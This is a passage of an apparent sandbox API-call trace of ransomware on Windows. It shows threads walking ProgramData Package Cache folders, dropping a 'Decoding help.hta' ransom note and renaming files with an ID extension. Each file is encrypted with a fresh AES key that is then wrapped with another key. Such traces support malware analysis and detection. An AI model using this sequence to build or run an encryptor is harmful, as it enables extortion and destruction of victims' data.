Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0042.913] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned 75 [0042.913] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" [0042.913] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\decoding help.hta")) returned 0x1 [0042.913] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x86.exe") returned -1 [0042.913] lstrlenW (lpString="vcredist_x86.exe") returned 16 [0042.913] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0042.913] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned 75 [0042.913] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="vcredist_x86.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" [0042.913] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" [0042.913] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0042.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.914] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c0 [0042.914] CreateFileMappingA (hFile=0x6c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x56c [0042.914] CryptAcquireContextA (in: phProv=0x1251fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1251fcec*=0x3448d80) returned 1 [0042.915] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x1251fce8 | out: phKey=0x1251fce8*=0x6719b0) returned 1 [0042.915] CryptExportKey (in: hKey=0x6719b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1251fbe4, pdwDataLen=0x1251fce4 | out: pbData=0x1251fbe4*, pdwDataLen=0x1251fce4*=0x2c) returned 1 [0042.915] MapViewOfFile (hFileMappingObject=0x56c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f420) returned 0xdf90000 [0042.924] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1251fbe4*, pdwDataLen=0x1251fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1251fbe4*, pdwDataLen=0x1251fcf8*=0x100) returned 1 [0042.924] CryptEncrypt (in: hKey=0x6719b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xdf90000, pdwDataLen=0x1251fce4*=0x6f420, dwBufLen=0x6f420 | out: pbData=0xdf90000*, pdwDataLen=0x1251fce4*=0x6f420) returned 1 [0043.141] UnmapViewOfFile (lpBaseAddress=0xdf90000) returned 1 [0043.146] CloseHandle (hObject=0x56c) returned 1 [0043.146] CryptDestroyKey (hKey=0x6719b0) returned 1 [0043.147] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0043.147] SetFilePointerEx (in: hFile=0x6c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.147] WriteFile (in: hFile=0x6c0, lpBuffer=0x1251fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1251fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1251fbe4*, lpNumberOfBytesWritten=0x1251fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.147] WriteFile (in: hFile=0x6c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1251fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1251fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.148] CloseHandle (hObject=0x6c0) returned 1 [0043.153] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.153] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1251fd30 | out: lpFindFileData=0x1251fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0043.153] FindClose (in: hFindFile=0x5d8a50 | out: hFindFile=0x5d8a50) returned 1 Thread: id = 239 os_tid = 0x8d0 [0040.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*", lpFindFileData=0x1265fd30 | out: lpFindFileData=0x1265fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ab0 [0041.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.950] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x1265fd30 | out: lpFindFileData=0x1265fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.950] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.950] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x1265fd30 | out: lpFindFileData=0x1265fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0041.951] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0041.951] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0041.951] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0041.951] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*" [0041.951] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*") returned 86 [0041.951] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0041.951] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*" [0041.951] GlobalMemoryStatus (in: lpBuffer=0x1265fd10 | out: lpBuffer=0x1265fd10) [0041.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c301e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4ac [0041.952] CloseHandle (hObject=0x4ac) returned 1 [0041.952] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x1265fd30 | out: lpFindFileData=0x1265fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0041.952] FindClose (in: hFindFile=0x5a5ab0 | out: hFindFile=0x5a5ab0) returned 1 Thread: id = 240 os_tid = 0x95c [0040.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*", lpFindFileData=0x1279fd30 | out: lpFindFileData=0x1279fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a10 [0042.086] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.086] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x1279fd30 | out: lpFindFileData=0x1279fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.086] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.086] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x1279fd30 | out: lpFindFileData=0x1279fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a127460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1c821ca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0042.086] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0042.086] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned 75 [0042.086] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" [0042.086] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\decoding help.hta")) returned 0xffffffff [0042.086] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0042.269] WriteFile (in: hFile=0x5a8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1279fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1279fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.270] CloseHandle (hObject=0x5a8) returned 1 [0042.270] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.270] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm") returned -1 [0042.270] lstrlenW (lpString="state.rsm") returned 9 [0042.270] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0042.271] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned 75 [0042.271] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" [0042.271] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" [0042.271] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" [0042.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0042.841] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4f8 [0042.841] CryptAcquireContextA (in: phProv=0x1279fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1279fcec*=0x3448b60) returned 1 [0042.842] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x1279fce8 | out: phKey=0x1279fce8*=0x5d8b90) returned 1 [0042.842] CryptExportKey (in: hKey=0x5d8b90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1279fbe4, pdwDataLen=0x1279fce4 | out: pbData=0x1279fbe4*, pdwDataLen=0x1279fce4*=0x2c) returned 1 [0042.842] MapViewOfFile (hFileMappingObject=0x4f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x280) returned 0x8b90000 [0042.860] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1279fbe4*, pdwDataLen=0x1279fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1279fbe4*, pdwDataLen=0x1279fcf8*=0x100) returned 1 [0042.860] CryptEncrypt (in: hKey=0x5d8b90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000*, pdwDataLen=0x1279fce4*=0x280, dwBufLen=0x280 | out: pbData=0x8b90000*, pdwDataLen=0x1279fce4*=0x280) returned 1 [0042.860] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0042.862] CloseHandle (hObject=0x4f8) returned 1 [0042.862] CryptDestroyKey (hKey=0x5d8b90) returned 1 [0042.862] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0042.862] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.862] WriteFile (in: hFile=0x5a8, lpBuffer=0x1279fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1279fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1279fbe4*, lpNumberOfBytesWritten=0x1279fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.863] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1279fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1279fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.863] CloseHandle (hObject=0x5a8) returned 1 [0042.864] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.864] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x1279fd30 | out: lpFindFileData=0x1279fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0042.864] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0042.864] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned 75 [0042.864] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" [0042.864] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\decoding help.hta")) returned 0x1 [0042.864] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x64.exe") returned -1 [0042.864] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0042.864] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0042.864] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned 75 [0042.864] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", lpString2="vcredist_x64.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" [0042.864] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" [0042.864] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0042.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.865] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 